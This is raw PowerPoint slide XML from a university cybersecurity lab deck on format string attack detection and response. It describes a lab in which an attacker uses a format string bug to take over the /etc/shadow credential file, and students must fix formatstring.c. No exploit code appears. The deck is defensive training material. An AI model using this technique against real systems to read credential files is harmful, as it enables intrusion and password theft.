              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B300BAF0-E79C-41CA-B4EC-F8D1704B4134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733120" y="5303015"/>
            <a:ext cx="9144000" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>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sz="1400" kern="0" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> attack exploits  .....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>This lab aims ....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The Symptom is  none.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> The Attack Method,  Detection and  Response method are shown in the following slides via  H. Lab Tasks and I. solutions .</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="직사각형 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05385685-93AD-4894-BE1B-CF2BD5865E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652492" y="3494858"/>
            <a:ext cx="11305256" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
              <a:t>E. Symptom </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>none</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="직사각형 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C2CDF3-D5B0-4A16-A4CE-114AB4F6C750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652492" y="4537436"/>
            <a:ext cx="3304110" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0"/>
              <a:t>D. Attack Method</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38C64E16-4739-4A2C-BC69-CE96071358AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583832" y="4519310"/>
            <a:ext cx="2297424" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0"/>
              <a:t>F. Detection</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="직사각형 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9435F971-7666-4A54-B186-808D5F34EA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7139656" y="4519310"/>
            <a:ext cx="2361544" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0"/>
              <a:t>G. Response</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="제목 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BCE533C-1559-4D06-A824-31DB14FD4A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="47270"/>
            <a:ext cx="11033871"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1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CYBER AEGIS for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Handong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Global Univ.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#81. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack Detection and Response</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398102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88F17B77-DE52-4FA2-B50D-EE00808AA86D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623392" y="1268760"/>
            <a:ext cx="11305256" cy="1785104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
              <a:t>H. Lab Tasks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Attacker seizes /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>formastring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> vulnerability and takeovers /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/shadow file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Analyze /sec/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> file, and then please remove the vulnerability. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="직사각형 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53A18F0A-3809-4E40-9A4A-493F42B97B4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611774" y="5301208"/>
            <a:ext cx="10560496" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>The Lab task is that …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Attacker seizes /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>formastring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> vulnerability and takeovers /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>/shadow file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Analyze /sec/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> file, and then please remove the vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="제목 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BCE533C-1559-4D06-A824-31DB14FD4A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="47270"/>
            <a:ext cx="11033871"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1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CYBER AEGIS for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Handong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Global Univ.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#81. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack Detection and Response</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152336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EDA6F7A-4335-4DC6-9D4C-ACCD7DA47290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="2060848"/>
            <a:ext cx="4968552" cy="2842505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="직사각형 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AE7F620-6F69-4B2A-9FD9-5151F1989A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623392" y="1268760"/>
            <a:ext cx="11305256" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500" latinLnBrk="1">
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
              <a:t>Solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="직사각형 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66B8125-4D03-4315-B247-3084F2528A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611774" y="5301208"/>
            <a:ext cx="10560496" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>For the Lab,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>You might connect to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>CyberAegis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> and login with your account.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>or Use VMWare Workstation Pro. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D335C4C8-22F9-4FF8-8524-40D735C20A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1784" y="1493527"/>
            <a:ext cx="6145167" cy="334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648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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9BD6F8A-B5FF-4856-B19C-C712A97B5C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991544" y="5487322"/>
            <a:ext cx="9144000"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sz="1400" kern="0" dirty="0"/>
              <a:t>The lab environment is consisted of Attack Server and Victim Server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The Attack Server is Kali-Linux and the Victim Server is CentOS 5.5.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>The login account is here.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="직사각형 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D8D3A92-0A46-4186-A771-BEFC29C6D972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407368" y="1377058"/>
            <a:ext cx="5472608" cy="383823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack Server (Kali-Linux) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648789" y="1377058"/>
            <a:ext cx="5328592" cy="410882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Victim Server (CentOS 5.5) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FB5DFBE-C63E-4CA5-BBAD-BBD603D4067E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2204778" y="2132856"/>
            <a:ext cx="1842273" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E2D34A2-6DEF-49F7-94C5-3AB79EC13AF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8550881" y="1999903"/>
            <a:ext cx="1488893" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="직선 연결선 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D12F485A-A568-4C17-9A9C-0FB8E84CF56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262112" y="1304764"/>
            <a:ext cx="0" cy="3312368"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
